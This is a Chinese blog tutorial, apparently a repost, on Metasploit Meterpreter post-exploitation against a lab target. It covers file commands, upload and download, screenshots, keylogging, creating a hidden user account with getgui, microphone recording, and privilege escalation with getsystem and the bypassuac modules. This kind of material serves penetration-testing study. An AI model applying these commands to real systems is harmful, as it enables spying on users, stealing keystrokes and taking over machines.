码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)


    目录

    1、文件交互指令

    2、上传下载文件(windows)

    3、屏幕截图(windows)

    4、键盘记录(windows)

     1、先启动记录keyscan_start

    2、显示键盘输入内容keyscan_dump

     3、结束监控keyscan_stop

    5、创建账户(windows)

    1、先看下目标靶机已存在用户

     2、使用getgui创建 一个用户名为 xiaowei  密码为 123456  的账户

    6、音频录像(Android)

     7、提权(Windows)

     方法一:

    方法二:


    1、文件交互指令

    CommandDescription
    cd{路径}切换靶机目录
    cat读取文件目录
    cp 复制文件到目标
    mv移动到目标
    chmod修改文件的权限(chmod 777 shell.elf)
    del/rm删除靶机目录
    dir打印靶机目录
    mkdir在靶机上创建目录
    rmdir靶机删除目录
    edit{文件所在地址或名}编辑文件
    getlwd打印本地目录路径
    getwd打印靶机目录路径
    lcd更改本地目录
    lls列出本地目录

    ls

    列出靶机的目录
    lpwd打印本地目录
    pwd打印工作目录
    search搜索文件 详细search -h
    etc


    2、上传下载文件(windows)

    CommandDescription
    upload传文件到靶机 
    download从靶机下载文件


    3、屏幕截图(windows)

    CommandDescription
    screenshot截图(Windows)

    4、键盘记录(windows)

     1、先启动记录keyscan_start

    2、显示键盘输入内容keyscan_dump

     3、结束监控keyscan_stop


     

    5、创建账户(windows)

    1、先看下目标靶机已存在用户

     meterpreter中输入:run post/windows/gather/enum_logged_on_users

     2、使用getgui创建 一个用户名为 xiaowei  密码为 123456  的账户

    1. run getgui -u xiaowei -p 123456
    2. run getgui -u {用户名}-p {密码}

     注意:

            创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。

    如果仍然出现错误,绕过UAC提权:

    • 先输入bg,进入后台
       

    •  使用这个模块use exploit/windows/local/ask
    • options查看需要配置哪些模块

    •  run

    6、音频录像(Android)

    record_mic -h        查看使用方法

     开始录音


     7、提权(Windows)

    先输入getuid查看当前用户的权限,可知为普通用户。

     方法一:

    getsystem
    

     

    方法二:

    使用msf模块提权

    先进入msf后台bg或者background

    1. 查询可以提权的模块        search bypassuac   查看提权模块
    2. 选择一个适合当前系统的提权模块      use 1(如果没有成功就选择其他模块)
    3. 配置模块使用参数     options (session值可以在终端直接输入session得到)
    4. 可以看到需要配置session  set session   {需要提权的session id}
    5. 执行提权   run
    6. 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功  需要在还终端内在输入 getsystem 获取权限 

  • 相关阅读:
    JavaEE面试题
    C语言进阶C++知识点补充(二)
    陪诊小程序系统平台功能模式
    交流转直流LED驱动芯片 MT7930 SOP8
    单片机硬件内部结构
    Python学习:自动生成Mysql建表语句
    Oracle EBS R12.1 FA 批量计划外折旧
    巧用抽象类与接口,打造高效Java程序(上)
    Vue3实现tab切换
    [buuctf][WUSTCTF2020]level1
  • 原文地址:https://blog.csdn.net/m0_61506558/article/details/126627850
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号